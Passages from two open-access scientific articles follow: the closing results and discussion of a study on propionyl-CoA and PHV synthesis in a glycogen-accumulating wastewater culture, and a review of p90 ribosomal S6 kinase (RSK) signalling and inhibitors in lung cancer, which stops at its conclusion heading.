For analyzing functional genes source, DIAMOND software with the same cut-off value was used to blast Unigenes to the KEGG database (Version 2018-01-01, http:// www. kegg. jp/ kegg/). For each sequence's blast result, the best Blast Hit was used for subsequent analysis. If the functional genes and taxonomy information were located in the same Unigenes, it was considered that the functional genes were contributed by this taxonomy. Subsequently, the relative abundance of different functional hierarchy and the gene number table of each sample in each taxonomy hierarchy were obtained. Then the top five hosts in terms of abundance were selected for the next step of analysis by ranking the host abundance of the annotated functional genes.
Establishment of GAOs reactor and performance indexes
The seeding sludge was collected from a secondary sedimentation tank of Tianjin wastewater treatment plant. In the process of sludge domestication, some indexes including acetate, glycogen, PHAs (PHB and PHV) and phosphate were performed. The long-term operation showed that the level of glycogen and PHAs (PHB and PHV) increased with the increasing time at the point of A60 (60 min of anaerobic), while the level of acetate decreased with the time. The level of glycogen synthesis also increased. Furthermore, the level of phosphorus almost retained unchanged. These results suggested that the rate of acetate removal and the level of glycogen and PHAs synthesis gradually increased in the system during the anaerobic period. The system showed Fig. 2 The performance of the GAOs enrichment culture system. a The changing levels of Glycogen, Acetate, PHAs and Phosphorus transformation during the 75 days operation. b The change levels of Glycogen, Acetate, PHAs and Phosphorus transformation in a typical cycle of the steady phage the characteristic of GAOs after 39 d (Fig. 2a). The above indexes were also conducted in a typical anaerobic-aerobic cycle of the steady stage, the system showed the typical phenotype of a GAOs enriched culture during the anaerobic-aerobic phase. The results showed that acetate was completely consumed in 60 min of the anaerobic stage, which was accompanied by a decrease in intracellular glycogen levels by 0.064 g/gSS. PHB and PHV levels increased by 0.059 g/gSS and 0.012 g/gSS, respectively, while phosphate level remained almost unchanged, indicating that organic substrates were completely consumed and transformed into intracellular storage polymers PHAs (PHB, PHV). The level of phosphate retained at 5 mg/L from the beginning of anaerobic phase to the end of anaerobic phase, and there was almost no phosphate release during the anaerobic phase, implying that the energy enquired for the anaerobic uptake of acetic acid was derived from glycogen degradation, not from polyphosphate hydrolysis. In the subsequent aerobic phase, glycogen is accumulated and the intracellular polymer PHAs (PHB and PHV) are used for growth and to replenish glycogen stores (Fig. 2b). These results demonstrated that the typical characterization of GAM was successfully constituted.
In this study, we further compared the ratios of PHB/ PHV production, glycogen consumption, phosphorous release, and acetic acid uptake to them of GAO/PAO models reported in the previous studies. The results indicated that the stoichiometric ratios were close to those of GAO or PAO models with glycogen accumulating metabolism (GAM). The ratios of Gly/VFA and PHAs/ VFA were slightly higher than those reported by other GAO models, while PHV/VFA and PHV/PHB ratios were lower, for example, the ratio of PHV/PHB was 0.22 (Table 1), suggesting that we successfully established the GAOs enrichment model.
Microbial community dynamics in the GAO enrichment system
To explore the distribution of microbial community and the dominant GAOs in the system, metagenomic sequencing was performed to quantify the microbial relative abundance at the genus level during reactor operation. The results showed that two kinds of GAOs Candidatus Contendobacter and Candidatus Competibacter were enriched, the relative abundance of Candidatus Contendobacter was higher from the beginning of the reactor operation to the stable stage of reactor than that of Competibacter, suggesting that Candidatus Contendobacter was the dominant GAO in the system (Fig. 3). At the beginning of reactor operation, Thauera was the dominant genus in the seeding sludge, followed by Nitrospira, Dechloromonas, Candidatus Accumulibacter, and Candidatus Contendobacter. From day 20 to day 39 of reactor operation, the relative abundance of Candidatus Contendobacter increased from 2.6 to 6.9%, and that of Candidatus Competibacter increased from 1.0 to 2.0%. On day 39, Candidatus Contendobacter replaced Thauera to become the dominant organism, and the relative abundance of Candidatus Contendobacter was 3.5 times higher than that of Candidatus Competibacter. Although the relative abundance of Candidatus Contendobacter slightly decreased after day 39, it continued to be the dominant organism in our system. These results further indicated that the characteristic of GAM contributed to the core community Candidatus Contendobacter in the system.
The first five genera of the succinate-propionate pathway in the system
Previous studies had reported that the ratio of PHV/ PHB was between 0.27 and 0.54, while the ratio of PHV/ PHB was 0.22 in our system and far lower than that of the previous studies (Table 1), which suggested that the PHV synthesis pathway was different from previous studies (Filipe et al. 2001;Lopez-Vazquez et al. 2007). Therefore, it was essential to identify the relevant reactions of PHV synthesis and enable a validated model simulation. Propionyl-CoA was the key substance in the process of PHAs synthesis. To elucidate the origin of propionyl-CoA during PHV synthesis, we analyzed the source of key genes in the succinate-propionate pathway closely related to PHV synthesis. The succinate-propionate pathway converted succinyl-CoA produced by the TCA cycle to propionyl-CoA through three steps. The first step was that succinyl-CoA converted to (R)-methyl-malonyl-CoA, which was catalyzed by methylmalonyl-CoA mutase (MUT). In the succinate-propionate pathway of this study, Candidatus Contendobacter and Candidatus Competibacter were presented only in the first five (TOP5) genera of MUT gene. MUT gene showed a high relative abundance in Candidatus Contendobacter (0.0-11.4%) and Candidatus Competibacter (2.9-12.8%) (Fig. 4a) the results showed that Candidatus Contendobacter and Candidatus Competibacter could convert succinyl-CoA to (R)-methylmalonyl-CoA. But the two key genes in other two steps, MCEEepi and E2.1.3.1-5s, were very low in the two types of GAOs (Fig. 4b, c). The results indicated that the abundance of key genes in the succinate-propionate pathway were low and changed slightly in the first five (TOP5) genera, suggesting the succinate-propionate pathway was not the advantageous pathway involved in PHV synthesis of Candidatus Contendobacter during the operating process.
The first five genera of the EMC pathway in the system
The EMC pathway has been reported as important sources of multiple coenzyme A including propionyl-CoA in Methylobacterium extorquens (Schneider et al. 2012), but the role of the EMC pathway in GAOs remained still unclear. In the EMC pathway, seven key genes including phbB, phaJ, ccr, ecm, mcd, mch, mcl, were involved in the synthesis of propionyl-CoA from acetyl-CoA, the abundance of top five (TOP 5) genera which containing the seven key genes changed markedly in the process of system operation. Metagenome analysis showed that the relative abundance of Candidatus Contendobacter ranged from 3.2 to 39.5%, which was significantly higher than that of other genera from day 20, and it was gradually increased with time. The relative abundance changes of Candidatus Contendobacter in the system were consistent with its relative abundance changes of the seven key genes including phbB, phaJ, ccr, ecm, mcd, mch, mcl in the EMC pathway ( Fig. 5a-g). But Candidatus Competibacter, another GAO, contained only five regulatory genes including phaJ, ccr, ecm, mcd, mch in the EMC pathway ( Fig. 5b-f ), further indicating that Candidatus Contendobacter could synthesize propionyl-CoA independently through the EMC pathway.
On day 39, the results showed that the relative abundance of key genes was involved in the EMC pathways and succinate-propionate pathways in Candidatus Contendobacter and Candidatus Competibacter (Fig. 6a). Candidatus Contendobacter contained all seven key genes of the EMC pathway, whereas Candidatus Competibacter contained only five key genes of The changes of the abundance of the first five genera which containing key genes that regulate propionyl-CoA production via the EMC pathway. a-g Represent the abundance changes of the first five genera for phbB, phaJ, ccr, ecm, mcd, mch, and mcl, respectively the EMC pathway. In contrast, Candidatus Contendobacter and Candidatus Competibacter only contained the MUT which was the first key gene of succinatepropionate pathways, while the other two regulatory genes, MCEEepi and E2.1.3.1-5S, were not present in the two types of GAOs (Fig. 6b), suggesting that EMC pathway played a crucial role in synthesizing PHV in Candidatus Contendobacter.
The gene expression validation of propionyl-CoA synthesis pathway in Candidatus Contendobacter
Although many studies had assessed PHV synthesis from metagenomic, few studies have analyzed it at the real-time expression level. To further validate the propionyl-CoA synthesis pathway in Candidatus Contendobacter, we conducted the expression levels of key genes in the EMC pathway at the transcriptional level after the system stabilization. Except for phbB, phaJ, the transcriptional activities of the remaining five genes, ccr, ecm, mcd, mch, mcl, were upregulated during reactor operation. The transcriptional expression levels of the two genes, ecm and mcl, were upregulated by more than two-fold; the transcriptional expression levels of the three genes, ccr, mcd, and mch, were up-regulated by more than four-fold. The results indicated that the EMC pathway was generally more active as the abundance of Candidatus Contendobacter increased. The transcriptional expression of ccr, mcd, and mch genes was much higher than that of phbB, phaJ, ecm, mcl from day 39, indicating that these three genes are more actively expressed in the EMC pathway (Fig. 7). The results further validated that propionyl-CoA was synthesized through EMC pathway by Candidatus Contendobacter.
The GAO enrichment model indicated the typical characteristic of GAM
In the previous EBPR systems, the presence of GAOs is of interest because their metabolism closely resembles that of PAOs, the only difference being the absence of Fig. 6 The analysis of key genes in Candidatus Contendobacter and Candidatus Competibacter on day 39. a Relative abundance of key genes of the EMC pathway. b Relative abundance of key genes of succinate-propionate pathway Fig. 7 The changes of the key gene expression in the EMC pathway during the reactor operation phosphorus cycling (Roy et al. 2021). However, it has been challenging to identify PAO and GAO metabolisms and their role as GAOs in full-scale EBPR plants.
In this study, Candidatus Contendobacter was the dominant GAO in our system rather than Candidatus Competibacter universally reported by many studies (Lanham et al. 2013;Ong et al. 2014). Candidatus Competibacter was the most common type of GAOs in both lab-scale reactors and full-scale wastewater biological treatment facilities (Nielsen et al. 2019;Yuan et al. 2020). Candidatus Contendobacter and Candidatus Competibacter were affiliated with Competibacter-lineage subgroups 5 and 1, respectively, suggesting that they might have different characteristics. In our system, Candidatus Contendobacter was the most dominant GAO, which could be because the operation mode was suitable for the growth of Candidatus Contendobacter rather than the growth of Candidatus Competibacter. Based on these findings, it could be concluded that the mode with decanting after the anaerobic period could effectively limit the growth of PAOs and successfully enriched the dominant GAO Candidatus Contendobacter. Compared with the previous GAO models, there were many differences in our system, our model degraded more glycogen and synthesized more PHAs, and relatively less PHV. A reducing equivalent source, such as reduced nicotinamide adenine dinucleotide (NADH), was required under anaerobic conditions for the synthesis of PHA. Many studies (McIlroy et al. 2014) suggested that the excess reducing equivalents would be produced, when the amount of glycogen degraded anaerobically was greater than that of reducing equivalents required for the anaerobic uptake of acetic acid by GAOs. This excess was theoretically balanced with the flux of pyruvate through the reductive branch of the tricarboxylic acid cycle (TCA) and the succinate-propionate pathway to form propionyl-CoA. This ester was in turn condensed with acetyl-CoA to form PHV and was evidenced by the production of PHV from acetic acid in GAO enrichments (Oehmen et al. 2007). Based on the previous studies, compared with phosphorus accumulating metabolism (PAM), more PHV was produced via GAM, suggesting that PHV was obtained due to the consumption of excess reducing equivalents to balance internal reducing power (NADH) (Acevedo et al. 2012). The system degraded more glycogen in the system, theoretically, the excess reducing equivalents should be consumed by succinate-propionate pathway to produce more PHV, but the amount of PHV synthesis was lower than that reported by the previous models. Therefore, we had a reason to infer that the GAOs enrichment system with the dominant GAO Candidatus Contendobacter had its characteristic on the utilization of the excess reducing power for propionyl-CoA forming and PHV synthesis.
The succinate-propionate pathway cannot contribute to PHV synthesis PHAs, a class of biodegradable polymers, were synthesized as energy storage molecules by many bacteria (Mannina et al. 2020;Pisco et al. 2009). GAOs utilized glycogen to obtain energy and reducing equivalents for VFA uptake and PHA storage. Under aerobic conditions, glycogen is regenerated from PHAs, which then supplied energy and reducing power for GAOs growth. PHAs were generally synthesized from acetyl-CoA and propionyl-CoA Propionyl-CoA can be synthesized via two potential pathways: succinate-propionate pathway and ethylmalonyl-CoA (EMC) pathways (De Meur et al. 2018;Schneider et al. 2012). In the former, propionyl-CoA was synthesized via succinyl CoA and 2-methyl-malonyl-CoA, which were TCA cycle intermediate metabolites (McIlroy et al. 2014), and in the latter, it was synthesized upon the conversion of acetyl-CoA. Finally, PHV was synthesized via propionyl-CoA combined with acetyl-CoA. In this study, genes source analyzed the relation between the three key genes of the succinate-propionate pathway and the first seven community of the system. The results indicated that MUT gene could locate in Candidatus Contendobacter and Candidatus Competibacter and had a high relative abundance. But the other two regulatory genes, MCEEepi and E2.1.3.1-5s, were not present in the two types of GAOs and had a significantly low relative abundance, especially E2.1.3.1-5s gene (Fig. 6b). These results implied that it was challenging for GAOs to synthesize propionyl-CoA via the succinate-propionate pathway in our system.
The EMC pathway: a novel propionyl-CoA synthesis pathway for PHV in Candidatus Contendobacter
In the present study, genes source analysis indicated that the seven key genes of the EMC pathway could completely located at Candidatus Contendobacter, whereas Candidatus Competibacter contained the only five key genes of the EMC pathway (Fig. 6a), suggesting that propionyl-CoA in Candidatus Contendobacter could be synthesized through the complete EMC pathway. Candidatus Contendobacter predominantly produced propionyl-CoA through the EMC pathway, which in turn supplied the substrates for PHV synthesis. The relative abundance of different key genes including phbB, phaJ, ccr, ecm, mcd, mch, mcl in the EMC pathway considerably varied in Candidatus Contendobacter. The previous studies had reported that the seven genes were located at the key nodes in the EMC pathway and played an important role in regulating the core enzymes of the EMC pathway (De Meur et al. 2018;Schneider et al. 2012). But Candidatus Competibacter expressed the only five core genes in the EMC pathway, it could not synthesize propionyl-CoA or PHV independently, which further suggested that Candidatus Contendobacter was mainly responsible for PHV production through the EMC pathway in our system.
Compared to the classic GAO model (Table 1), we also found that glycogen degradation was greater in the anaerobic phage than that in other GAO models, one reason could be that the EMC pathway in Candidatus Contendobacter produced lower levels of propionyl-CoA to balance an equivalent amount of reducing power than the succinate-propionate pathway; another reason could be that the EMC pathway had more intermediates participated in other pathways. For example, mesaconyl-CoA in the EMC pathway also participated in the glyoxylate and dicarboxylate metabolism pathway, which could affect the amount of propionyl-CoA synthesis in different GAO models. Candidatus Contendobacter in our system was more inclined to invoke the EMC pathway to synthesize propionyl-CoA, consequently playing a pivotal role in PHV synthesis. Genes source analysis also showed that Candidatus Contendobacter was the main bacterium that invoked genes expression of EMC pathway in the system. In this manner, Candidatus Contendobacter synthesized the key substrate for PHV synthesis (propionyl-CoA) through the EMC pathway.
In summary, we successfully constructed GAOs enrichment system, which showed the classic GAM from the dominant organisms Candidatus Contendobacter. We found that the ethylmalonyl-CoA (EMC) pathway was the crucial pathway supplying propionyl-CoA for polyβ-hydroxyvalerate (PHV) synthesis in Candidatus Contendobacter. Gene source analysis showed that the genes of EMC pathway expression increased with Candidatus Contendobacter enrichment, further validating that propionyl-CoA was synthesized by Candidatus Contendobacter predominantly via EMC pathway. Our work revealed the novel mechanisms underlying PHV synthesis through EMC pathway and improved the intercellular storage metabolism of GAOs. | 2022-03-27T06:22:34.251Z | 2022-03-25T00:00:00.000 | {
"year": 2022,
"sha1": "f3c362d6d4b4bd4cc059b25d396d5b991bc7eaa6",
"oa_license": "CCBY",
"oa_url": "https://amb-express.springeropen.com/track/pdf/10.1186/s13568-022-01380-3",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "45600535726f2d2ce952c958e7dbffc1708ebe73",
"s2fieldsofstudy": [
"Environmental Science",
"Biology",
"Chemistry"
],
"extfieldsofstudy": [
"Medicine"
]
} |
14411102 | pes2o/s2orc | v3-fos-license | p90 ribosomal S6 kinase: a potential therapeutic target in lung cancer
A global survey of cancer has shown that lung cancer is the most common cause of the new cancer cases and cancer deaths in men worldwide. The mortality from lung cancer is more than the combined mortality from breast, prostate and colorectal cancers. The two major histological types of lung cancer are non-small cell lung cancer (NSCLC) accounting for about 85 % of cases and small cell lung cancer accounting for 15 % of cases. NSCLC, the more prevalent form of lung cancer, is often diagnosed at an advanced stage and has a very poor prognosis. Many factors have been shown to contribute to the development of lung cancer in humans including tobacco smoking, exposure to environmental carcinogens (asbestos, or radon) and genetic factors. Despite the advances in treatment, lung cancer remains one of the leading causes of cancer death worldwide. Interestingly, the overall 5 year survival from lung cancer has not changed appreciably in the past 25 years. For this reason, novel and more effective treatments and strategies for NSCLC are critically needed. p90 ribosomal S6 kinase (RSK), a serine threonine kinase that lies downstream of the Ras–MAPK (mitogen activated protein kinase) cascade, has been demonstrated to be involved in the regulation of cell proliferation in various malignancies through indirect (e.g., modulation of transcription factors) or direct effects on the cell-cycle machinery. Increased expression of RSK has been demonstrated in various cancers, including lung cancer. This review focuses on the role of RSK in lung cancer and its potential therapeutic application.
Background
Lung cancer has emerged as a major public health problem and is the leading cause of cancer related death in both men and women worldwide [1,2]. The expected number of lung cancer deaths in the U.S in 2015 is 158,040 [1]. Unfortunately, standard treatment modalities such as chemotherapy, radiotherapy, and surgery have reached a plateau [3]. Therefore, research efforts to identify alternatives to the conventional treatment are needed. A better understanding of the molecular origin and pathophysiology of lung cancer are essential to developing novel molecular targets for the treatment and prevention of lung cancer.
Two major forms of lung carcinoma exist including non-small cell lung cancer (NSCLC), which consists of approximately 85 % of all lung cancers and small cell lung cancer (SCLC), which accounts for 15 % of all lung cancers. The 5 year survival rate of NSCLC is about 18 % [4] and for small cell lung cancer is 6 % [5]. The three major histologic subtypes of NSCLC include adenocarcinomas, squamous cell carcinoma and large cell lung cancer. Adenocarcinomas, the most common histological variant seen in non-smokers and the one which presents with the best prognosis, accounts for 40 % of all lung cancers [6]. It is also the most common variant seen in females and adults less than 60 years of age [7]. This review focuses on the molecular mechanism and potential therapeutic targets for lung cancer, with emphasis on lung adenocarcinomas. adaptations to tolerate the oncogenic changes [8]. The cellular adaptations attributed to lung cancer include self-sufficient growth signals due to the occurrence of mutations in proto-oncogenes, lack of sensitivity to antiproliferating signals as a result of mutations in tumor suppressor genes, evasion of apoptosis, unlimited replicative potential, detachment of tumor cells from the extracellular matrix, which leads to invasion of surrounding tissue and basal lamina. Tumor cells also have the capacity of sustained angiogenesis and they transport through the blood stream and migrate to distant sites, leading to the formation of a metastatic lesion [8,9]. Cancerous cells have also been demonstrated to have a reversed pH gradient compared with normal adult cells. They exhibit a constitutively higher intracellular pH (pH i ) and a lower extracellular pH (pH e ) [10]. This increased pH i favors cell proliferation, cell survival, evasion from apoptosis, cell migration and promotes tumor invasion [10]. An understanding of the mutated oncogenes, genetic alterations and the cellular adaptations has paved the road for identifying molecular therapeutic targets.
Epidermal growth factor and the epidermal growth factor receptor in lung adenocarcinomas
Epidermal growth factor receptor (EGFR) is overexpressed in 32-81 % of NSCLC [11]. EGFR plays a major role in activating several downstream signaling pathways like Ras/Raf/MEK/MAPK and the pathway consisting of phosphoinositide 3-kinase (PI3K), Akt, and the mammalian target of rapamycin (mTOR). Activation of these major downstream signaling pathways contribute to the cell proliferation, increased survival, invasiveness, metastatic spread, and angiogenesis in tumor cells [2]. Numerous therapeutics agents are available to target EGFR in NSCLC including Erlotinib, Geftinib and Cetuximab. Despite the importance of EGFR in mediating NSCLC, many of the available therapeutic agents targeting EGFR are ineffective [11]. Acquired resistance to the anti-EGFR agents also results from secondary mutations specifically in the exon 20 of the EGFR gene [3,8]. Recent studies have also suggested that Ras mutations in lung adenocarcinomas were found to be associated with resistance to EGFR tyrosine kinase inhibitors (TKI) [3]. In addition, persistent activity of the mitogen activated protein kinase/extracellular-signal-regulated kinase (MAPK/ ERK) pathway and the PI3K/Akt kinase pathway could contribute to the resistance of NSCLC to EGFR inhibitors [12]. Other proposed resistance mechanisms to EGFR inhibitors include amplification of the MET protooncogene, which activates PI3K pathway independent of the EGFR [13] and activation of other tyrosine kinase receptors such as the insulin like growth factor receptor 1 [2]. This has directed research activity towards identifying other molecular targets like Ras, Raf, MAPK and ERK, which may be beneficial in the management of lung adenocarcinomas.
Ras proto-oncogene
The Ras proto-oncogene plays an important role in the transduction of growth promoting signals from the cell membrane to the nucleus and the resulting cell proliferation [9]. The Ras proto-oncogene family (KRas, HRas, NRas and RRas) encodes four highly homologous 21 kDa membrane-bound proteins. Proteins encoded by the Ras genes exist in two states: an active state, in which GTP is bound to the Ras and an inactive state, where the GTP has been cleaved to GDP through the intrinsic GTPase activity [3]. The GTPase Ras activates Raf (A-, B-and C-Raf isoforms) [14]. The signal for cell proliferation is ultimately transmitted by a cascade of RAS-dependent kinases, which activates the MAPKs. It is noteworthy that 15-30 % of lung adenocarcinomas harbor activating mutations in the Ras family members, especially the KRas [3]. Mutations in the Ras induces defects in the intrinsic GTPase activity of Ras resulting in continuous cell proliferation [9]. The importance of KRas in lung carcinomas makes it a promising therapeutic target [8,15]. However, Ras inhibitors (farnesyl transferase inhibitors) which inhibit post-translational modification and membrane localization of Ras proteins have been unsuccessful in clinical trials. This could be attributed to the fact that these inhibitors are not selectively active in tumors with KRas or NRas mutations [8,15]. Recent research has focused on investigating downstream effectors of RAS including MAPKs, since they control fewer of the downstream pathways [8,16].
Mitogen activated protein kinases and lung adenocarcinomas
The MAPK/ERK pathway is activated by various extracellular stimuli including mitogens, cytokines, growth factors and cellular stresses [17]. The binding of EGF to the EGFR activates the Ras proto-oncogene, which then activates the Raf kinase. In turn, Raf phosphorylates and activates the MAPK/ERK kinase (MEK)1/2, a dual-specificity protein kinase, which activate ERK1/2. Once activated, the ERK1/2 phosphorylates several substrates including members of the RSK (90 kDa ribosomal S6 kinase) family [14]. The Ras-MAPK also activates the PI3K/AKT pathway that regulates the normal cell proliferation, survival, growth and differentiation [8].
Mutations or overexpression of many of the signaling components in the MAPK pathway can confer oncogenic potential and lead to several human cancers [17,18]. Activation of the Ras/Raf/MEK/MAPK via activating mutations in KRas occurs in approximately 30 % of adenocarcinomas [3]. Activation of downstream signaling pathways such as PI3K and MAPK occur independent of the EGFR signaling, therefore, rendering KRas mutant tumors resistant to anti EGFR agents and chemotherapy [19]. Therefore, targeting the downstream effectors of this pathway represent an untapped pool of possible therapeutic targets in the treatment of lung cancer. Currently, two MEK1/2 inhibitors, selumetinib and trametinib, have been tested in many different cancer types including NSCLC [17]. Selumetinib, which is the agent furthest in development raised a concerning rate of hospitalization, grade 3 or 4 neutropenia, and febrile neutropenia [17]. Therefore, research efforts have been directed to identifying a small set of effectors such as RSK, which are less likely to cause severe adverse effects [16,20].
RSK family of kinases
The efforts to identify the kinase activity responsible for the phosphorylation of ribosomal protein S6 (rpS6), led to the purification of an intracellular kinase that phosphorylated 40S ribosomal subunit from unfertilized Xenopus laevis eggs by Erikson and Maller laboratories in 1985. This kinase was initially referred to as ribosomal S6 kinase (S6K) [21]. The identification of two protein kinases of 85-90 kDa (S6KI and S6KII) by biochemical purification, led to the cloning of cDNAs encoding highly homologous proteins that were later renamed p90 ribosomal S6 kinase [14]. The RSK family of proteins comprises a group of highly conserved serine/threonine kinases that lie downstream of the Ras-MAPK pathway and regulate diverse cellular processes such as cell growth and motility, cell proliferation and cell survival [14,18].
Structure of RSK
The structure of RSK is characterized by two distinct kinase domains separated by a linker region of about 100 amino acids and flanked by N-and C-terminal ends [18]. The RSKs are 73-80 % identical with each other and are mostly divergent in their N-and C-terminal sequences [14,22]. The carboxyl-terminal kinase domain (CTKD) is closely related to the calcium/calmodulin-dependent protein kinase (CAMK) family. In contrast, the aminoterminal kinase domain (NTKD) is homologous to that of AGC kinases. The CTKD is responsible for autophosphorylation of RSK and the NTKD is involved in substrate phosphorylation [18]. Finally, the C-terminal region contains an ERK1/2 docking site also known as the D-domain, which is responsible for the docking and activation of RSK by ERK1/2 [22].
RSK family
In humans, the RSK family comprises of four isoforms (RSK1 to −4) and two structurally related cousins, called RSK-like protein kinase/mitogen and stress activated kinase-1 (RLPK/MSK1) and RSK-B (MSK2) [22]. Analysis of the expression patterns of RSK isoforms showed that RSK1 mRNA are more abundant in the lung, kidney, pancreas, bone marrow and T cells. RSK2 mRNA are predominantly found in T cells, lymph nodes, and the prostate. RSK3 transcripts are mainly expressed in the lung, brain, spinal cord, and retina. Interestingly, RSK4 mRNA expression in both adult and embryonic tissues is much lower than that of the other three isoforms. But Northern blotting of lysates from adult mouse tissues has revealed the expression of RSK4 mRNA in the brain, cerebellum, heart, renal tissue and skeletal muscle [18,22].
Activators of RSK
RSKs are directly phosphorylated and activated by ERK1/2 and phosphoinositide dependent protein kinase 1 (PDK1) in response to various stimuli including growth factors, neurotransmitters and phorbol esters [18]. The MSKs are potently activated by both the ERK1/2 and the p38 pathways and are generally thought to be more responsive to cellular stress [18,23]. Unlike the RSKs, MSK is usually located in the nucleus of cells and phosphorylates transcription factors [24]. Mutational analysis revealed that four phosphorylation sites (Ser221, Ser363, Ser380, and Thr573 in human RSK1) are essential for RSK activation upon mitogenic stimulation [10,19]. The phosphorylation of Thr573 in the CTKD occurs following ERK activation. This activation also requires ERK docking at the D domain. The Ser380 is auto-phosphorylated by the activated CTKD [18]. Phosphorylation of Ser221 in the NTKD is mediated by PDK1 for RSK1-3, which leads to complete activation of RSK. This is further emphasized in PDK1 deficient cells, where mitogens do not stimulate RSK1-3 activity [14]. Once activated the RSKs may remain associated with the membrane, or in the cytosol or translocate to the nucleus, and eventually can phosphorylate substrates throughout the cell [18].
Biological function of RSK isoforms
The biological function of the RSK isoforms is to regulate cell-cycle progression and cell proliferation, cell growth and protein synthesis, nuclear signaling, cell migration and cell survival [14,23].
Activation of cytosolic and nuclear proteins through phosphorylated RSK
Activation of the RSK protein kinase results in the phosphorylation of functionally diverse RSK substrates in the cytosol and nucleus. In the cytosol, phosphorylated RSK substrates include glycogen synthase kinase 3 (GSK3), protein phosphatase 1, LK B1, L1 CAM (a neural cell adhesion molecule), the Ras exchange factor; and membrane-associated tyrosine and threonine specific cyclin dependent kinase 1 or cell division cycle protein [17]. Nuclear translocation of phosphorylated RSK following mitogenic stimulation leads to phosphorylation of a variety of transcription factors including CREB, CREB binding protein (CBP), serum response factor (SRF), p300, ER81, oestrogen receptor-α (ERα), c-Fos, nuclear factor-Κb (NF-κB), NFATc4, NFAT3 and the transcription initiation factor TIF1A [23,24]. Activation of these cytosolic and nuclear proteins contributes to the initiation and progression of tumorgenesis [23].
RSK and cell cycle machinery
RSKs are involved in the regulation of cell-cycle progression through phosphorylation of several mediators of the cell-cycle machinery. RSK mediated phosphorylation inactivates membrane-associated tyrosine and threonine specific CDC2 inhibitory kinase-1 (Myt1), leading to G2-M cell-cycle progression [18]. RSK1 and RSK2 have also been shown to promote G1-phase progression by phosphorylating the cyclin-dependent kinase (CDK) inhibitor p27 KIP1 . In addition, RSK phosphorylates serum response factor (SRF) and contributes to the transcriptional activation of c-FOS. Activation of c-FOS results in the activation of cyclin D1, promoting G1-S phase progression [18]. RSK phosphorylates and inhibits glycogen synthase kinase (GSK3), which has been suggested to promote stabilization of cyclin D1 and MYC, resulting in cell cycle progression and cell survival [18,23]. In addition, RSK phosphorylates eEF2K and the translation-initiation factor eIF4B, which in turn stimulates its recruitment to the translation-initiation complex and contributes to cell growth and survival [14]. The phosphorylation of transcription factors such as CREB by RSK1 and RSK2 promotes cell survival by activating prosurvival genes such as members of the B cell lymphoma protein-2 (Bcl2) family [22]. Clearly, activation of RSK is critical in the phosphorylation of numerous mediators involved in the cell-cycle machinery.
RSK and apoptosis
High levels of endogenous Bcl2 are expressed in several lung cancer cell lines including those from NSCLC and SCLC [9]. The fate of these cancer cells is largely dependent on the balance between inhibitory and stimulatory apoptosis signals from the Bcl2 family. The subfamily members including Bcl2, Bcl-XL, and Mcl-1 inhibit apoptosis, whereas the Bax subfamily, consisting of Bax and Bak, as well as the BH3-only subfamily, including Bad, Bid, Bok, Bik, and Bim, promotes apoptosis [25].
RSK enhances cell survival via anti-apoptotic mechanisms [16,22]. RSK phosphorylates the pro-apoptotic protein Bad and enhances its binding to 14-3-3 proteins. This prevents Bad from antagonizing the pro-survival function of Bcl-XL [22]. The RSK mediated phosphorylation of the death associated protein kinase (DAPK) leads to inhibition of its pro-apoptotic function [26]. RSK1/2 mediated phosphorylation of a tumor suppressor gene Bim-EL prevents its pro-apoptotic function [22,27]. RSK1 directly inhibits caspase activity leading to increased cell survival [28]. Taken together, these data indicate that RSKs are invariably involved in cell proliferation and survival, making them promising therapeutic targets for the treatment of cancer.
RSK and lung cancer
RSKs have been demonstrated to be over expressed or hyper activated in several cancers including breast cancer, lung cancer, prostate cancer, head and neck squamous cell carcinoma, ovarian carcinoma, multiple myeloma, melanoma and osteosarcoma [16,29]. Different RSK isoforms behave differently depending on the type of cancer.
Activation or overexpression of RSK in lung cancer cells inhibits cell death via inactivation of the pro-apoptotic protein Bad [16]. Similarly, Bim-EL, which is sequentially phosphorylated by ERK and RSK1 or RSK2, is decreased in NSCLC cells with EGFR-activating mutations. The decrease in Bim-EL results in proteosomal degradation of BIM-EL and increased cell survival [30]. When the H-Ras/ERK pathway is activated in tumor cells, BIM-EL is eliminated by proteasomal degradation [27]. Additionally the expression of DAPKm which behaves as a tumor suppressor, is commonly silenced in lung cancer through DNA methylation [14]. Lara and colleagues observed that RSK4 is overexpressed in more than 50 % of primary malignant lung cancers though its levels are undetectable in normal cells [22]. Interesting, a previous report by Lara et al. demonstrated that the knock down of p90RSK isoform 1 enhanced the metastatic potential of A549 lung adenocarcinoma cells. Similarly, an siRNA kinome library screen in A549 cells demonstrated that p90RSK isoform 1 silencing increased migration and invasion [30]. Moreover, Lara et al. [29] reported that there is an increased migration in A549 cells caused by RSK 2 and 4. Clearly, the exact role and signaling pathway of the respective RSK isoforms in lung cancer remain unknown.
RSK inhibitors
The identification of RSK inhibitors has uncovered an unexpected link between RSK activity and cell proliferation. Several pan-RSK small-molecule inhibitors exist including two competitive inhibitors that target the NTKD (SL-0101 and BI-D1870) and an irreversible inhibitor of the CTKD, FMK [22]. The first specific inhibitor identified for p90 RSK was SL0101, which was isolated from the tropical plant Forsteronia refracta. When tested against a panel of 70 kinases, it was shown to target RSK1 and RSK2 in the nanomolar range (IC 50 for RSK2, 90 nmol/L at 10 mmol/L ATP) while having no significant activity against other tested AGC kinases [28]. The dihydropteridinone BI-D1870 is a reversible inhibitor that competes with ATP by binding to the NTKD ATP-interacting sequence. BI-D1870 is remarkably selective for RSK relative to other AGC kinases [31] and its in vitro IC 50 was shown to be approximately 15-30 nM at an ATP concentration of 100 μM [32]. In vivo results indicate that to completely inhibit the phosphorylation of RSK substrates in vitro, a concentration of 10 μM BI-D1870 is required [32]. The pyrrolopyrimidine FMK (fluoromethylketone) is an irreversible inhibitor that covalently modifies the CTKD of RSK1, RSK2 and RSK4. FMK is a potent and specific inhibitor of RSK and was shown to inhibit RSK2 at an IC 50 of 15 nM and an EC 50 of 200 nM in vitro [33]. Recently another CTKD inhibitor, dibenzyl trisulfide, has been isolated from the Petiveria alliacea L plant. It specifically inhibits the RSK1 isoform at a concentration of 10 µM [20]. Therefore, the discovery of RSK-specific inhibitors will definitely help to advance the knowledge of RSK-mediated mechanisms in lung cancer and to test the potential of these inhibitors in pre-clinical studies. Our own unpublished data suggests that exposure of A549 lung adenocarcinoma cells to BI-D1870 decreases RSK1 protein expression and is associated with a decrease in cell migration and proliferation. Indeed, with the discovery of RSK-specific inhibitors further studies will need to be carried to verify the efficacy of RSK inhibitors as single agents or in combination with other anti-cancer agents in the lung cancer setting.
Conclusion
